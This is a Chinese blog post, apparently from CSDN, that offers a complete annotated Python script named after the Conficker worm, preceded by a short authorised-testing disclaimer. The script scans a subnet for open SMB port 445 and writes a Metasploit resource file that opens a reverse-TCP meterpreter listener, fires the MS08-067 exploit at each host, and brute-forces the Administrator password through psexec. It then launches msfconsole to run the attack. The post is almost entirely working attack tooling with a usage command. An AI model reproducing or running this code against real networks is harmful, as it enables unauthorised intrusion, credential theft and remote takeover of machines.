构建Conficker

最新推荐文章于 2025-05-07 21:52:50 发布

luky！

最新推荐文章于 2025-05-07 21:52:50 发布

阅读量1.1k

点赞数 24

文章标签：网络 python

本文链接：https://blog.csdn.net/qq_68809241/article/details/143954158

版权

代码涉及到网络安全相关的漏洞利用和攻击行为，仅可在合法授权的测试环境（如自己搭建的用于安全研究、测试漏洞防护机制有效性的实验环境等）中使用，在未经授权的网络上运行此类代码属于违法行为，可能会造成严重的安全后果和法律责任。 它展示了一种自动化进行网络扫描、漏洞利用配置并尝试攻击的流程逻辑，旨在方便安全研究人员对相关技术进行学习和实践安全防护策略验证等工作。
import os
import sys
import nmap
import argparse

# 函数功能：通过Nmap扫描指定子网中开放445端口的主机，找到目标主机并返回其列表
# 参数subNet：要扫描的子网地址，例如 "192.168.1.0/24"
def findTgts(subNet):
    # 创建一个nmap.PortScanner对象，用于执行端口扫描操作
    nmScan = nmap.PortScanner()
    # 对指定子网的445端口进行扫描
    nmScan.scan(subNet, '445')
    tgtHosts = []
    # 遍历扫描到的所有主机
    for host in nmScan.all_hosts():
        # 判断当前主机是否有TCP协议的445端口相关信息
        if nmScan[host].has_tcp(445):
            state = nmScan[host]['tcp'][445]['state']
            # 如果该端口状态为开放
            if state == 'open':
                print('[+] Found Target Host: ' + host)
                tgtHosts.append(host)
    return tgtHosts


# 函数功能：向配置文件中写入Metasploit的handler相关配置信息，用于设置反向连接监听等
# 参数configFile：配置文件的名称（路径），例如 "meta.rc"
# 参数lhost：本地监听的IP地址，用于接收反向连接
# 参数lport：本地监听的端口号，用于接收反向连接
def setupHandler(configFile, lhost, lport):
    with open(configFile, 'a') as file:
        # 写入使用multi/handler模块的命令
        file.write('use exploit/multi/handler\n')
        # 设置payload为windows/meterpreter/reverse_tcp，用于反向连接获取meterpreter shell
        file.write('set payload windows/meterpreter/reverse_tcp\n')
        # 设置本地监听端口号
        file.write('set LPORT ' + str(lport) + '\n')
        # 设置本地监听IP地址
        file.write('set LHOST ' + lhost + '\n')
        # 以后台作业模式（-j选项）执行exploit命令，即启动监听等待连接
        file.write('exploit -j\n')
        # 设置全局变量，禁用默认的Payload处理程序（这里可能是根据特定需求进行的设置）
        file.write('setg DisablePayloadHandler 1\n')


# 函数功能：向配置文件中写入针对Conficker漏洞（MS08_067）的利用配置信息
# 参数configFile：配置文件的名称（路径），如 "meta.rc"
# 参数tgtHost：目标主机的IP地址，要攻击的目标
# 参数lhost：本地监听的IP地址，用于接收反向连接
# 参数lport：本地监听的端口号，用于接收反向连接
def confickerExploit(configFile, tgtHost, lhost, lport):
    with open(configFile, 'a') as file:
        # 写入使用windows/smb/ms08_067_netapi漏洞利用模块的命令
        file.write('use exploit/windows/smb/ms08_067_netapi\n')
        # 设置目标主机的IP地址（远程主机）
        file.write('set RHOST ' + str(tgtHost) + '\n')
        # 设置payload为windows/meterpreter/reverse_tcp，用于反向连接获取meterpreter shell
        file.write('set payload windows/meterpreter/reverse_tcp\n')
        # 设置本地监听端口号
        file.write('set LPORT ' + str(lport) + '\n')
        # 设置本地监听IP地址
        file.write('set LHOST ' + lhost + '\n')
        # 以后台作业模式（-j选项）执行exploit命令，尝试利用漏洞进行攻击
        file.write('exploit -j\n')


# 函数功能：向配置文件中写入针对Windows SMB服务的暴力破解相关配置信息
# 参数configFile：配置文件的名称（路径），例如 "meta.rc"
# 参数tgtHost：目标主机的IP地址，要攻击的目标
# 参数passwdFile：包含密码的文件路径，用于读取密码进行暴力破解尝试
# 参数lhost：本地监听的IP地址，用于接收反向连接
# 参数lport：本地监听的端口号，用于接收反向连接
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
    username = 'Administrator'
    with open(passwdFile, 'r') as pF:
        for password in pF.readlines():
            password = password.strip('\n').strip('\r')
            with open(configFile, 'a') as file:
                # 写入使用windows/smb/psexec模块的命令，常用于通过SMB执行命令等操作
                file.write('use exploit/windows/smb/psexec\n')
                # 设置SMB服务的密码
                file.write('set SMBPass ' + password + '\n')
                # 设置payload为windows/meterpreter/reverse_tcp，用于反向连接获取meterpreter shell
                file.write('set payload windows/meterpreter/reverse_tcp\n')
                # 设置目标主机的IP地址（远程主机）
                file.write('set RHOST ' + str(tgtHost) + '\n')
                # 设置SMB服务的用户名
                file.write('set SMBUser ' + username + '\n')
                # 设置本地监听IP地址
                file.write('set LHOST ' + lhost + '\n')
                # 以后台作业模式（-j选项）执行exploit命令，尝试利用给定用户名和密码进行暴力破解攻击
                file.write('exploit -j\n')


def main():
    # 创建一个命令行参数解析器对象，用于解析用户输入的命令行参数
    parser = argparse.ArgumentParser(description='Network scanning and exploitation tool.')
    # 添加一个必需的命令行参数，用于指定目标地址（可以是单个IP或子网等形式）
    parser.add_argument('-H', '--tgtHost', required=True, help='specify the target address[es]')
    # 添加一个可选的命令行参数，用于指定本地监听端口号，默认值为1337
    parser.add_argument('-p', '--lport', type=int, default=1337, help='specify the listen port')
    # 添加一个必需的命令行参数，用于指定本地监听的IP地址
    parser.add_argument('-l', '--lhost', required=True, help='specify the listen address')
    # 添加一个可选的命令行参数，用于指定包含密码的文件路径，用于SMB暴力破解
    parser.add_argument('-F', '--passwdFile', help='password file for SMB brute force attempt')

    args = parser.parse_args()

    configFile = 'meta.rc'
    # 调用findTgts函数查找目标主机列表，传入用户指定的目标地址（子网或IP等）
    tgtHosts = findTgts(args.tgtHost)
    # 调用setupHandler函数，向配置文件中写入handler相关配置信息，用于设置反向连接监听等
    setupHandler(configFile, args.lhost, args.lport)
    for tgtHost in tgtHosts:
        # 对每个找到的目标主机，调用confickerExploit函数写入针对Conficker漏洞的利用配置信息
        confickerExploit(configFile, tgtHost, args.lhost, args.lport)
        # 如果用户指定了密码文件（即要进行SMB暴力破解），则调用smbBrute函数写入相关配置信息
        if args.passwdFile:
            smbBrute(configFile, tgtHost, args.passwdFile, args.lhost, args.lport)
    # 使用os.system调用Metasploit控制台，并加载配置文件（meta.rc）来执行之前配置好的攻击和监听操作
    os.system('msfconsole -r meta.rc')


if __name__ == '__main__':
    main()
运行命令：python 构建Conficker.py -H <目标子网或主机> -l <监听主机IP> [-p <监听端口>] [-F <密码文件路径>]
或者：

运行结果：
太多了只显示一部分